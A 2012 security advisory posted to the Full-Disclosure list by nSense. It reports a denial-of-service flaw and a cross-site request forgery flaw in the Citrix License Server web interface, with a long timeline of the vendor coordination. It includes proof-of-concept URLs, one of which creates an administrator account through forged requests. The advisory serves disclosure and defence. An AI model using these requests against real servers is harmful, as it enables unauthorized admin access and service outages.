[Full-disclosure] nSense-2012-001: Citrix License Server



nSense Vulnerability Research Security Advisory NSENSE-2012-001
---------------------------------------------------------------

Affected Vendor: Citrix
Affected Product: Citrix License Server 11.6.1 build 10007
Impact: DoS, CSRF
Vendor response: New version released
CVE: N/A
Credit: Rune & Knud aka Smurfbuddies / nSense
Release date: 15 Mar 2012
Vendor link: http://support.citrix.com/article/CTX128167

Technical details
---------------------------------------------------------------

The license server web management interface contains two
vulnerabilities:
1) Denial-of-Service vulnerability which allows an
unauthenticated attacker to crash the license server.

2) Cross Site Request Forgery vulnerability which enables an
attacker to create additional users in the management
interface, IF a logged-in administrator can be lured to
visit a link pointing to the vulnerable functionality.

Timeline:
2010-12-20 Sent an e-mail to secure@xxxxxxxxxx with
vulnerability details
2010-12-20 Citrix acknowledged the submission and opened a case
2011-01-31 Requested a status update
2011-01-31 Citrix replied, stated vulnerabilities are in a
third party component
2011-01-31 Requested more detailed information about the patch
schedule
2011-02-14 Requested a status update
2011-02-14 Citrix replied
2011-02-16 Requested more detailed information to justify
deadline extension
2011-02-17 Citrix replied
2011-02-17 Requested information about the bulletin
2011-02-17 Citrix replied
2011-02-23 Citrix delivered bulletin information
2011-02-23 Requested information regarding the bulletin
2011-02-23 Citrix replied
2011-02-24 Supplied Citrix information about nSense disclosure
policy
2011-03-20 Requested information about the patch schedule
2011-03-29 Requested a status update
2011-03-30 Enquired whether e-mails had been received
2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from
support@xxxxxxxxxx
2011-03-31 Citrix replied
2011-03-31 Acknowledged continuing coordination
2011-04-19 Requested a status update
2011-05-25 Requested a status update
2011-06-15 Requested a status update
2011-06-16 Citrix replied
2011-07-17 Requested a status update
2011-08-17 Requested a status update
2011-08-17 Citrix replied
2011-10-12 Requested a status update
2011-10-21 Requested a status update
2011-10-21 Citrix replied. Still validating patches,
still no release date set
2011-11-18 Requested a status update. Sent timeline to
Citrix
2011-12-05 Citrix replied. Targeting February 2012.
Citrix promised to send new information if
the planned schedule changes
2012-02-29 February 2012 officially over. No news
from Citrix
2012-03-02 Citrix informed they are preparing a release
2012-03-05 Replied and specified credit information
2012-03-13 Citrix replied. Sent knowledge base link
2012-03-15 Advisory released. Old nSense vulnerability
coordination policy officially terminated.

Proof-of-Concept:
http://citrix-license-server-ip:8082/users?licenseTab=&selected
=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&con
firm=xsrf&accountType=admin&originalAccountType=&Create=Save
(Administrator CSRF)

http://citrix-license-server-ip:8082/dashboard?
<something long here>=2 (pre auth DoS, crashes lmadmin.exe)

Note! The lmadmin crash was _not_ analyzed in any way.

Additional information
----------------------
As our current vulnerability coordination policy has come to
an end, we wanted to share with you some of the lap times from
vendors who have gone through our test track.

Vendor with a reasonably-priced vulnerability

Leaderboard
-----------
VeryPDF: 1 week
Nullsoft: 2 weeks
Adobe: 2 months
Cisco: 2.5 months
SAP: 2.5 months
Adobe: 3 months
Teamspeak: 3 months / no patch (CERT-FI)
Azeotech: 3.5 months (ICS-CERT)
Angelina Jolie*: 5 months (ICS-CERT)
Apple: 6 months
Novell: 8 months
Citrix: 15 months
* Bill Bailey, or was it Scadatec?

And on this bombshell, it is time to end. Good night!
---------------------------------------------------------------
http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages